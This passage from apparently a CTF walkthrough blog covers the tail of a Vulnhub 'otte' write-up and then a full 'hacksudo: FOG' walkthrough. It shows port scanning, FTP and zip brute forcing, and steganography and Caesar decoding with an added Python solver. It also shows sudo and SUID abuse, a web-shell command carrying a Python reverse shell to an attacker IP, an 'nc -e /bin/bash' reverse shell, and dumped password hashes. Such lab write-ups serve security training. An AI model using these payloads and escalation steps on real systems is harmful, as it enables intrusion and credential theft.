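On the real file the IHDR payload decodes to 300x300, bit depth 8, colour type 6, matching the dump above.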

Use CyberChef to render the PNG file and get a QR code.

[image-20210523212230214.png]

Decode the QR code to get a link.

[image-20210523212429143.png]

Visit https://eqrcode.co/a/SVxQdM, get password of thomas.

Log in via ssh as thomas and check sudo.

 thomas@otte:/home/laetitia$ sudo -l
 Matching Defaults entries for thomas on otte:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User thomas may run the following commands on otte:
     (laetitia) NOPASSWD: /usr/bin/python3 /home/laetitia/simpler.py *

Run simpler.py; when asked for an IP, enter a shell command.

 thomas@otte:/home/laetitia$ sudo -u laetitia /usr/bin/python3 /home/laetitia/simpler.py -p
 ***********************************************
      _                 _
  ___(_)_ __ ___  _ __ | | ___ _ __ _ __  _   _
 / __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
 \__ \ | | | | | | |_) | |  __/ |_ | |_) | |_| |
 |___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
                 |_|               |_|    |___/
                                 @ironhackers.es

 ***********************************************

 Enter an IP: $("/bin/bash")
 laetitia@otte:~$

This shell is not interactive; run 'nc x.x.x.x xxxx -e /bin/bash' to get another reverse shell, which is interactive.

[image-20210523220810457.png]

Check sudo again, as laetitia.

 laetitia@otte:~$ sudo -l
 sudo -l
 Matching Defaults entries for laetitia on otte:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User laetitia may run the following commands on otte:
     (cedric) NOPASSWD: /usr/bin/w3m

Use php to start a temporary HTTP server on the local machine, use w3m to visit port 80, and spawn a shell.

 sudo -u cedric /usr/bin/w3m http://192.168.56.150

Then run !/bin/bash; now we are user cedric.

[image-20210523221401950.png]

In /home/cedric/.ssh, upload id_rsa.pub.

 wget http://192.168.56.150/id_rsa.pub -O authorized_keys

Then we can log in via ssh as cedric.

Check sudo again.

 cedric@otte:~$ sudo -l
 Matching Defaults entries for cedric on otte:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User cedric may run the following commands on otte:
     (ALL : ALL) NOPASSWD: /usr/bin/mmwatch

After checking the code of mmwatch, we can read root's id_rsa through it.

 sudo /usr/bin/mmwatch "cat /root/.ssh/id_rsa"

Then we can log in via ssh as root.

 root@otte:~# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 otte
 root@otte:~# ls -la /root
 total 40
 drwx------  4 root root 4096 May 20 10:30 .
 drwxr-xr-x 18 root root 4096 May 15 12:07 ..
 lrwxrwxrwx  1 root root    9 May 16 13:25 .bash_history -> /dev/null
 -rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
 drwxr-xr-x  3 root root 4096 May 15 12:13 .local
 -rw-------  1 root root 1500 May 15 13:23 .mysql_history
 -rw-r--r--  1 root root  148 Aug 17  2015 .profile
 -rwx------  1 root root   33 May 16 14:02 root.txt
 drwx------  2 root root 4096 May 16 13:24 .ssh
 -rw-r--r--  1 root root  173 May 15 12:19 .wget-hsts
 -rw-------  1 root root  100 May 20 10:30 .Xauthority

Vulnhub hacksudo: FOG Walkthrough

https://www.vulnhub.com/entry/hacksudo-fog,697/

Scan open ports.

 nmap -sV -sC -p- -oN ports.log 192.168.56.100

 PORT      STATE SERVICE   VERSION
 21/tcp    open  ftp       Pure-FTPd
 22/tcp    open  ssh       OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 80/tcp    open  http      Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Hacksudo FOG
 111/tcp   open  rpcbind   2-4 (RPC #100000)
 443/tcp   open  ssl/https Apache/2.4.38 (Debian)
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Hacksudo FOG
 2049/tcp  open  nfs_acl   3 (RPC #100227)
 3306/tcp  open  mysql     MySQL 5.5.5-10.3.27-MariaDB-0+deb10u1
 ...
 43195/tcp open  mountd    1-3 (RPC #100005)
 45469/tcp open  nlockmgr  1-4 (RPC #100021)
 48871/tcp open  mountd    1-3 (RPC #100005)
 52195/tcp open  mountd    1-3 (RPC #100005)

Scan folders/files of port 80, download dict.txt.

 gobuster dir -u http://192.168.56.100 -t 50  -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-big.txt  -x .html,.php,.txt,.bak,.zip -b 401,403,404,500 --wildcard   -o 80.log
 /index.php            (Status: 302) [Size: 0] [--> /fog/index.php]
 /index.html           (Status: 200) [Size: 853]
 /index1.html          (Status: 200) [Size: 329]
 /cms                  (Status: 301) [Size: 314] [--> http://192.168.56.100/cms/]
 /dict.txt             (Status: 200) [Size: 1798]
 /fog                  (Status: 301) [Size: 314] [--> http://192.168.56.100/fog/]

Found the username hacksudo on the CMS page.

[image-20210518224756405.png]

Brute-force FTP.

 hydra -l hacksudo -P dict.txt  -t 32 192.168.56.100 ftp -f
 Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

 Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-05-18 22:38:34
 [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
 [DATA] max 32 tasks per 1 server, overall 32 tasks, 196 login tries (l:1/p:196), ~7 tries per task
 [DATA] attacking ftp://192.168.56.100:21/
 [21][ftp] host: 192.168.56.100   login: hacksudo   password: hackme
 [STATUS] attack finished for 192.168.56.100 (valid pair found)
 1 of 1 target successfully completed, 1 valid password found

Download secr3tSteg.zip.

 ftp> ls -la
 200 PORT command successful
 150 Connecting to port 43827
 drwxr-xr-x    3 1002       ftpgroup         4096 May  7 03:34 .
 drwxr-xr-x    3 1002       ftpgroup         4096 May  7 03:34 ..
 -rw-r--r--    1 33         33                389 May  7 03:34 flag1.txt
 drwxr-xr-x    2 0          0                4096 May  6 13:57 hacksudo_ISRO_bak
 226-Options: -a -l
 226 4 matches total
 ftp> cd hacksudo_ISRO_bak
 250 OK. Current directory is /hacksudo_ISRO_bak
 ftp> ls -la
 200 PORT command successful
 150 Connecting to port 46515
 drwxr-xr-x    2 0          0                4096 May  6 13:57 .
 drwxr-xr-x    3 1002       ftpgroup         4096 May  7 03:34 ..
 -rw-r--r--    1 0          0                  63 May  5 11:07 authors.txt
 -rw-r--r--    1 0          0                   0 May  6 11:36 installfog
 -rw-r--r--    1 0          0             1573833 May  6 19:24 secr3tSteg.zip

Brute-force the password of the zip.

 fcrackzip -u -D -p /usr/share/wordlists/rock_ascii.txt secr3tSteg.zip    
 PASSWORD FOUND!!!!: pw == fooled

Download the SoundStegno tool linked in the source code of index1.html.

[image-20210519103824772.png]

Decode the wav file unzipped from secr3tSteg.zip to get hints.

 python3 /opt/SoundStegno/ExWave.py  -f ./hacksudoSTEGNO.wav  
 ...
 Visit for more tutorials : www.youtube.com/techchipnet
 Hide your text message in wave audio file like MR.ROBOT
 Please wait...
 Your Secret Message is: Shift by 3
 ABCDEFGHIJKLMNOPQRSTUVWXYZ
 DEFGHIJKLMNOPQRSTUVWXYZABC
 zzzz.orfdokrvw/irj Xvhuqdph=irj:sdvvzrug=kdfnvxgrLVUR
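
The Caesar decryption from the hint, carried through in code as an added example (not from the original post). The brute-force function shows why the "Shift by 3" hint was not strictly needed: with only 26 keys, scanning all of them and looking for expected tokens recovers the plaintext on its own.

```python
import string

ALPHABET = string.ascii_uppercase

# Ciphertext recovered from the wav file above
CIPHERTEXT = 'zzzz.orfdokrvw/irj Xvhuqdph=irj:sdvvzrug=kdfnvxgrLVUR'


def caesar_shift(text, shift):
    """Rotate A-Z/a-z by `shift` positions (negative to undo); other characters pass through."""
    out = []
    for ch in text:
        upper = ch.upper()
        if len(upper) == 1 and upper in ALPHABET:
            rotated = ALPHABET[(ALPHABET.index(upper) + shift) % 26]
            out.append(rotated if ch.isupper() else rotated.lower())
        else:
            out.append(ch)
    return ''.join(out)


def caesar_decrypt(ciphertext, shift):
    """Undo a Caesar encryption that shifted the alphabet forward by `shift`."""
    return caesar_shift(ciphertext, -shift)


def brute_force(ciphertext, known_words=('password', 'username')):
    """Try all 26 shifts; return (shift, plaintext) for every candidate containing a known word."""
    hits = []
    for s in range(26):
        candidate = caesar_shift(ciphertext, -s)
        if any(w in candidate.lower() for w in known_words):
            hits.append((s, candidate))
    return hits


if __name__ == '__main__':
    print(caesar_decrypt(CIPHERTEXT, 3))
    for shift, plaintext in brute_force(CIPHERTEXT):
        print(f'shift {shift}: {plaintext}')
```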

Decrypt the Caesar message at http://rumkin.com/tools/cipher/caesar-keyed.php.

[image-20210518224455131.png]

Log in to the CMS with hacksudo:hacksudoISRO. Found cmsmsrce.txt.

[image-20210518224924381.png]

Check the content of the txt file.

[image-20210519104218050.png]

Copy cmsmsrce.txt to shell.php and visit the following address in the browser.

http://192.168.56.100/cms/uploads/shell.php?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.56.150%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/bash%22,%22-i%22]);%27

At the same time, listen on port 1234 in another terminal to get the reverse shell.

[image-20210519104609411.png]

Find SUID files.

 find / -perm -u=s 2>/dev/null
 /usr/lib/openssh/ssh-keysign
 /usr/lib/eject/dmcrypt-get-device
 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
 /usr/sbin/mount.nfs
 /usr/bin/gpasswd
 /usr/bin/umount
 /usr/bin/sudo
 /usr/bin/chfn
 /usr/bin/look
 /usr/bin/mount
 /usr/bin/chsh
 /usr/bin/newgrp
 /usr/bin/su
 /usr/bin/passwd

Use look to read /etc/shadow.

 www-data@hacksudo:/home$ look '' /etc/shadow
 look '' /etc/shadow
 root:$6$zHA6yDSHPcoPX7dX$2oZJxM7gBzhQIT049d4MuR7jAypyZpDPoo6aKQfkJAfJNKF/CgY1GYFCu.Wb5cB6713Zjtzgk.ls0evZ6YToD/:18756:0:99999:7:::
 ...
 isro:$6$DMdxcRB0fQbGflz2$39vmRyBB0JubEZpJJN13rSzssMQ6t1R6KXLSPjOmpImsyuWqyXHneT8CH0nKr.XDEzKIjt1H3ndbNzirCjOAa/:18756:0:99999:7:::
 dnsmasq:*:18756:0:99999:7:::

Crack isro's password.

 john --wordlist=/usr/share/wordlists/rock_ascii.txt  hash.txt
 Using default input encoding: UTF-8
 Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
 Cost 1 (iteration count) is 5000 for all loaded hashes
 Will run 2 OpenMP threads
 Press 'q' or Ctrl-C to abort, almost any other key for status
 qwerty           (isro)

Log in via ssh as user isro. Check sudo, but it's a rabbit hole.

 ssh isro@192.168.56.100
 isro@192.168.56.100's password:
 Linux hacksudo 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

 The programs included with the Debian GNU/Linux system are free software;
 the exact distribution terms for each program are described in the
 individual files in /usr/share/doc/*/copyright.

 Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
 permitted by applicable law.
 Last login: Tue May 18 11:33:26 2021 from 192.168.56.150
 isro@hacksudo:~$ sudo -l
 [sudo] password for isro:
 Matching Defaults entries for isro on hacksudo:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User isro may run the following commands on hacksudo:
     (root) /usr/bin/ls /home/isro/*
 isro@hacksudo:~$

In /home/isro/fog, we find an executable owned by root.

 isro@hacksudo:~$ ls -la
 total 40
 drwxr-x--- 5 isro isro 4096 May 18 12:16 .
 drwxr-xr-x 6 root root 4096 May  8 12:25 ..
 -rw------- 1 root isro   41 May 18 11:44 .bash_history
 -rw-r--r-- 1 isro isro    0 May  5 14:05 .bash_logout
 -rw-r--r-- 1 isro isro 4623 May 13 04:59 .bashrc
 drwxr-xr-x 2 isro isro 4096 May 13 05:06 fog
 drwx------ 3 isro isro 4096 May  5 14:09 .gnupg
 drwxr-xr-x 3 isro isro 4096 May  5 14:11 .local
 -rw-r--r-- 1 isro isro    0 May  5 14:05 .profile
 -r-------- 1 isro isro   33 May  6 14:31 user.txt
 -rw------- 1 isro isro   54 May 18 12:16 .Xauthority
 isro@hacksudo:~$ cd fog
 isro@hacksudo:~/fog$ ls -la
 total 3700
 drwxr-xr-x 2 isro isro    4096 May 13 05:06 .
 drwxr-x--- 5 isro isro    4096 May 18 12:16 ..
 -rwxr-xr-x 1 root isro   16712 May 12 13:46 fog
 -rw-r--r-- 1 isro isro       0 May  6 14:30 get
 -rwxr-xr-x 1 isro isro   69368 May  6 14:29 ping
 -rwxr-xr-x 1 isro isro 3689352 May  6 14:30 python

Run fog to get a Python shell; check id, and it's root.

 isro@hacksudo:~/fog$ ./fog
 Python 2.7.16 (default, Oct 10 2019, 22:02:15)
 [GCC 8.3.0] on linux2
 Type "help", "copyright", "credits" or "license" for more information.
 >>> import os;os.system("id");
 uid=0(root) gid=1003(isro) groups=1003(isro)
 0

Spawn a root shell.

 >>> import pty;pty.spawn("/bin/bash");
 ┌──(root💀hacksudo)-[~/fog]
 └─# id;hostname
 uid=0(root) gid=1003(isro) groups=1003(isro)
 hacksudo